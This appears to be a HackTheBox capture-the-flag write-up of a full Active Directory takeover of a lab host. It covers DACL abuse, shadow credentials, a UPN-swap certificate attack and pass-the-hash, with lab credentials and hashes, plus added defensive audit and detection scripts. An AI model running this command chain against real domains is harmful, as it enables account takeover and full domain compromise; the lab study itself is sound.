
HackTheBox Certified Writeup

Explore the fundamentals of cybersecurity in the Certified Capture The Flag (CTF) challenge, a medium-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

10.10.11.41 certified.htb

Script to add hosts automatically

ip="10.10.11.41"
domain="certified.htb"
# Append the entry only if it is not already present in /etc/hosts
grep -qF "$ip $domain" /etc/hosts || echo "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV certified.htb

Nmap scan report for certified.htb (10.10.11.41)
Host is up (0.050s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-07 08:07:35Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2024-11-07T08:08:57+00:00; +7h00m00s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-07T08:08:57+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-07T08:08:57+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-07T08:08:57+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-11-07T08:08:20
|_  start_date: N/A
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s

Provided credentials:

  • User: judith.mader
  • Password: judith09

Run BloodHound Data Collection:

bloodhound-python -d certified.htb -c All -ns 10.10.11.41 --zip -u judith.mader -p judith09 --use-ldap

Resolving Clock Skew Issues

Synchronize System Time:

  • Check the current time offset using NTP:

    ntpdate -q 10.10.11.41

Adjust Time for Commands:

  • Define a function that runs a command with the clock shifted by the DC's NTP offset (requires libfaketime):

    # Runs any command with the wall clock moved forward by the offset ntpdate
    # reports for the DC, so Kerberos requests fall inside the KDC's skew tolerance.
    fakedate() {
      /usr/bin/faketime "$(date -d "$(date) $(echo "$(ntpdate -q 10.10.11.41)" | awk '/offset/ {print $10}' | sed 's/,$//') seconds" "+%Y-%m-%d %H:%M:%S")" "$@"
    }

Execute Time-Sensitive Command:

  • Run the Kerberos-related command with the corrected time:

    fakedate GetUserSPNs.py certified.htb/judith.mader:judith09 -dc-ip 10.10.11.41 -request

Note: No need to crack the password; this is just to verify that it works.
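Why the 7-hour skew from the nmap scan breaks Kerberos, and what the fakedate() helper is compensating for, as an added example (not part of the original writeup): the script parses a constructed `ntpdate -q` output, compares the offset with the default 5-minute tolerance a KDC allows before answering KRB_AP_ERR_SKEW, and produces the same "YYYY-mm-dd HH:MM:SS" string that faketime receives. The sample output and the local timestamp are made up; only the +7h offset mirrors what the scan reported.

```python
import re
from datetime import datetime, timedelta

# Default Kerberos tolerance for the clock difference between client and KDC
# (the "Maximum tolerance for computer clock synchronization" policy), in seconds.
KERBEROS_MAX_SKEW_SECONDS = 300

# Constructed sample of `ntpdate -q` output (not captured from the box); the
# offset mirrors the +7h skew the nmap scan reported for the DC.
SAMPLE_NTPDATE_OUTPUT = """\
server 10.10.11.41, stratum 2, offset +25200.012345, delay 0.05208
 7 Nov 01:08:57 ntpdate[4242]: step time server 10.10.11.41 offset +25200.012345 sec
"""

# Matches "offset <signed decimal>" wherever ntpdate prints it.
_OFFSET_RE = re.compile(r"\boffset\s+([+-]?\d+(?:\.\d+)?)")


def parse_ntpdate_offset(output: str) -> float:
    """Return the clock offset in seconds (DC time minus local time).

    ntpdate prints one "offset" per sampled server plus a summary line; the
    summary comes last, so the final match is used. Raises ValueError if none.
    """
    matches = _OFFSET_RE.findall(output)
    if not matches:
        raise ValueError("no 'offset' field found in ntpdate output")
    return float(matches[-1])


def exceeds_kerberos_tolerance(offset_seconds: float) -> bool:
    """True when the skew is large enough for the KDC to reject the request."""
    return abs(offset_seconds) > KERBEROS_MAX_SKEW_SECONDS


def dc_wall_clock(local_now: datetime, offset_seconds: float) -> datetime:
    """The time the DC believes it is, derived from our clock plus the offset."""
    return local_now + timedelta(seconds=offset_seconds)


def faketime_string(local_now_iso: str, offset_seconds: float) -> str:
    """Format the shifted time the way fakedate() hands it to faketime."""
    local_now = datetime.fromisoformat(local_now_iso)
    return dc_wall_clock(local_now, offset_seconds).strftime("%Y-%m-%d %H:%M:%S")


if __name__ == "__main__":
    offset = parse_ntpdate_offset(SAMPLE_NTPDATE_OUTPUT)
    print(f"offset {offset:+.3f}s, Kerberos tolerance exceeded: "
          f"{exceeds_kerberos_tolerance(offset)}")
    # Constructed local time; on a real host use datetime.now().isoformat()
    print("faketime argument:", faketime_string("2024-11-07T01:08:57", offset))
```

A skew this large is also a finding in its own right: domain members that drift by hours stop authenticating, so a defender would fix the DC's time source rather than shift the client's clock.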

Privilege Escalation

Set Judith as Owner of Management Group:

bloodyad --host 10.10.11.41 -d "certified.htb" -u "judith.mader" -p "judith09" set owner Management judith.mader

Grant Judith Write Permissions for Management Members:

dacledit.py 'certified.htb/judith.mader:judith09' -action write -rights WriteMembers -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB'

Add Judith to the Management Group:

net rpc group addmem "Management" "judith.mader" -I 10.10.11.41 -U 'certified.htb\judith.mader%judith09'
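The three steps above chain because each right implies the next: the object owner can rewrite the DACL, a DACL writer can grant WriteMembers, and WriteMembers adds the member. The following audit check, an added example that is not part of the original writeup, runs that reasoning over an exported list of ACEs so a defender can see which non-privileged principals can end up controlling a group (and, through it, the accounts the group has write rights on). The ACE list is constructed: the judith.mader -> Management WriteOwner edge is what this writeup exercised; the Management -> management_svc GenericWrite edge and the other entries are assumptions for illustration.

```python
from collections import deque

# Rights that let a principal end up controlling an object's membership or
# attributes. WriteOwner and WriteDacl are included because they lead to the
# others in two steps, exactly as the writeup performed by hand.
CONTROL_RIGHTS = {"Owns", "WriteOwner", "WriteDacl", "WriteMembers",
                  "GenericAll", "GenericWrite"}

# Principals expected to hold such rights; anything else is a finding.
PRIVILEGED = {"Domain Admins", "Enterprise Admins", "Administrators"}

# Constructed ACE export as (principal, right, target). Only the first edge is
# taken from the writeup; the rest is assumed.
SAMPLE_ACES = [
    ("judith.mader", "WriteOwner", "Management"),
    ("Management", "GenericWrite", "management_svc"),   # assumed
    ("Domain Admins", "GenericAll", "Management"),       # assumed, expected
    ("judith.mader", "ReadProperty", "management_svc"),  # harmless read right
]


def control_edges(aces):
    """Map principal -> set of objects it can take control of directly."""
    edges = {}
    for principal, right, target in aces:
        if right in CONTROL_RIGHTS:
            edges.setdefault(principal, set()).add(target)
    return edges


def reachable_objects(aces, start):
    """Objects `start` can end up controlling.

    A controlled group is treated as joinable, so the group's own rights are
    followed transitively. This simplification ignores adminCount protection
    and inheritance; it is meant for triage, not a full BloodHound replacement.
    """
    edges = control_edges(aces)
    seen, queue = set(), deque([start])
    while queue:
        node = queue.popleft()
        for target in edges.get(node, ()):
            if target not in seen:
                seen.add(target)
                queue.append(target)
    return seen


def unexpected_controllers(aces, obj, privileged=PRIVILEGED):
    """Principals outside the privileged allowlist that can reach control of `obj`."""
    principals = {principal for principal, _, _ in aces}
    return {p for p in principals - privileged if obj in reachable_objects(aces, p)}


if __name__ == "__main__":
    for obj in ("Management", "management_svc"):
        print(f"{obj}: controllable by {sorted(unexpected_controllers(SAMPLE_ACES, obj))}")
```

Run against a real export (for example the ACL edges BloodHound collected above), the same function points at the ACE that should be removed: a plain user holding WriteOwner on a group is the whole problem, regardless of how many hops follow it.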

Install PyWhisker and add a shadow credential (KeyCredential) to management_svc:

git clone https://github.com/0xPreDa/pywhisker
cd pywhisker
pipx ensurepath
pipx install .
pywhisker -d certified.htb --dc-ip 10.10.11.41 -u 'judith.mader' -p 'judith09' -t 'management_svc' --action add

Encountering "[!] Unsupported hash type MD4" in PyWhisker? Enable the legacy algorithms in OpenSSL to resolve this:

  1. Edit the OpenSSL config:

    sudo nano /etc/ssl/openssl.cnf

  2. Add the following to enable MD4:

    [provider_sect]
    default = default_sect
    legacy = legacy_sect

    [default_sect]
    activate = 1

    [legacy_sect]
    activate = 1


For more info, see this GitHub issue.

Get a TGT Using PKINIT:

fakedate gettgtpkinit -cert-pfx $(pwd)/<file>.pfx -pfx-pass '<psw>' -dc-ip 10.10.11.41 certified.htb/management_svc management_svc.ccache

Set ccache and Retrieve NT Hash:

export KRB5CCNAME=management_svc.ccache
fakedate getnthash certified.htb/management_svc -key <key>

  • <key> is the AS-REP encryption key that gettgtpkinit printed in the previous step.
  • Result: NT hash for management_svc is a091c1832bcdd4677c28b5a6a1295584.

Log in over WinRM with the hash:

evil-winrm -i certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584

Retrieve User Flag

type \users\management_svc\desktop\user.txt

Impersonate ca_operator from management_svc: the DACL (Discretionary Access Control List) on ca_operator grants management_svc full control over the account, so a shadow credential can be added to it as well.

fakedate certipy shadow auto -username "management_svc@certified.htb" -hashes a091c1832bcdd4677c28b5a6a1295584 -account ca_operator

  • Result: NT hash for ca_operator is b4b86f45c6018f1b664f70805f45d8f2.

Update UPN for ca_operator:

certipy account update -username "management_svc@certified.htb" -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator

Request a Certificate as ca_operator, which now carries the Administrator UPN:

certipy req -username 'ca_operator@certified.htb' -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -target 'DC01.certified.htb' -ca 'certified-DC01-CA' -dc-ip 10.10.11.41 -template CertifiedAuthentication -debug

Restore UPN for ca_operator:

certipy account update -username "management_svc@certified.htb" -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn "ca_operator@certified.htb"
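Both halves of this chain leave a clear trail in the Security log on the DC, which is what a defender would key on: the shadow-credential writes (pywhisker on management_svc, then `certipy shadow auto` on ca_operator, which adds a KeyCredential and removes it again afterwards) show up as Event 5136 modifications of msDS-KeyCredentialLink, and the UPN swap shows up as Event 4738 with a User Principal Name that no longer names the account it belongs to. The triage script below is an added example, not part of the original writeup or of any of the tools it uses; the event records are constructed dictionaries carrying only the EventData fields the checks need, and the actor and target names mirror this writeup. Note that 5136 is only logged when the "Directory Service Changes" audit subcategory is enabled and the object's SACL audits property writes.

```python
import re

SHADOW_CRED_ATTRIBUTE = "msds-keycredentiallink"

# Constructed security-log records (not real logs from the box). 5136 is
# "A directory service object was modified", 4738 is "A user account was
# changed"; field names follow the events' EventData names, values are made up.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "judith.mader",
     "ObjectDN": "CN=management_svc,CN=Users,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
    {"EventID": 5136, "SubjectUserName": "DC01$",
     "ObjectDN": "CN=DC01,OU=Domain Controllers,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName", "OperationType": "Value Added"},
    {"EventID": 5136, "SubjectUserName": "management_svc",
     "ObjectDN": "CN=ca_operator,CN=Users,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
    {"EventID": 5136, "SubjectUserName": "management_svc",
     "ObjectDN": "CN=ca_operator,CN=Users,DC=certified,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Deleted"},
    {"EventID": 4738, "SubjectUserName": "management_svc", "TargetUserName": "ca_operator",
     "UserPrincipalName": "Administrator"},
    {"EventID": 4738, "SubjectUserName": "management_svc", "TargetUserName": "ca_operator",
     "UserPrincipalName": "ca_operator@certified.htb"},
    {"EventID": 4738, "SubjectUserName": "helpdesk.admin", "TargetUserName": "alice",
     "UserPrincipalName": "-"},  # "-" means the UPN field was not changed
]


def cn_from_dn(dn: str) -> str:
    """First CN= component of a DN, lower-cased ('CN=foo,CN=Users,...' -> 'foo')."""
    m = re.match(r"\s*cn=([^,]+)", dn, re.IGNORECASE)
    return m.group(1).strip().lower() if m else ""


def shadow_credential_writes(events, allowed_writers=frozenset()):
    """5136 events that change msDS-KeyCredentialLink on someone else's account.

    Legitimate writes (Windows Hello, device registration) are made by the
    account itself or by a known provisioning identity, so those are skipped.
    """
    allowed = {a.lower() for a in allowed_writers}
    findings = []
    for ev in events:
        if ev.get("EventID") != 5136:
            continue
        if ev.get("AttributeLDAPDisplayName", "").lower() != SHADOW_CRED_ATTRIBUTE:
            continue
        actor = ev["SubjectUserName"].lower()
        target = cn_from_dn(ev["ObjectDN"])
        if actor == target or actor in allowed:
            continue
        findings.append({"rule": "shadow-credential-write", "actor": actor,
                         "target": target, "detail": ev.get("OperationType", "")})
    return findings


def upn_rewrites(events):
    """4738 events where the new UPN no longer names the account it belongs to."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4738:
            continue
        upn = ev.get("UserPrincipalName", "-")
        if upn == "-":
            continue
        target = ev["TargetUserName"].lower()
        local_part, sep, _suffix = upn.lower().partition("@")
        reasons = []
        if local_part != target:
            reasons.append(f"UPN names '{local_part}', account is '{target}'")
        if not sep:
            reasons.append("UPN has no domain suffix")
        if reasons:
            findings.append({"rule": "upn-rewrite", "actor": ev["SubjectUserName"].lower(),
                             "target": target, "detail": "; ".join(reasons)})
    return findings


def triage(events, allowed_writers=frozenset()):
    """All findings from both checks, in log order within each rule."""
    return shadow_credential_writes(events, allowed_writers) + upn_rewrites(events)


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['rule']:24} {f['actor']} -> {f['target']}: {f['detail']}")
```

The "Value Added" followed minutes later by "Value Deleted" on the same account by the same actor is the signature of the automated shadow-credential flow; a UPN rewrite to a bare name with no domain suffix, set by a principal other than an administrator, is the precondition for the certificate request in the step above and is worth alerting on even when it is reverted straight away, as it is here.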

Authenticate as Administrator:

fakedate certipy auth -pfx administrator.pfx -domain "certified.htb"

Execute Remote Command as Administrator:

psexec.py administrator@certified.htb -hashes :0d5b49608bbce1751f708748f67e2d34

Retrieve Root Flag

type \users\administrator\desktop\root.txt

This post is licensed under CC BY 4.0 by the author.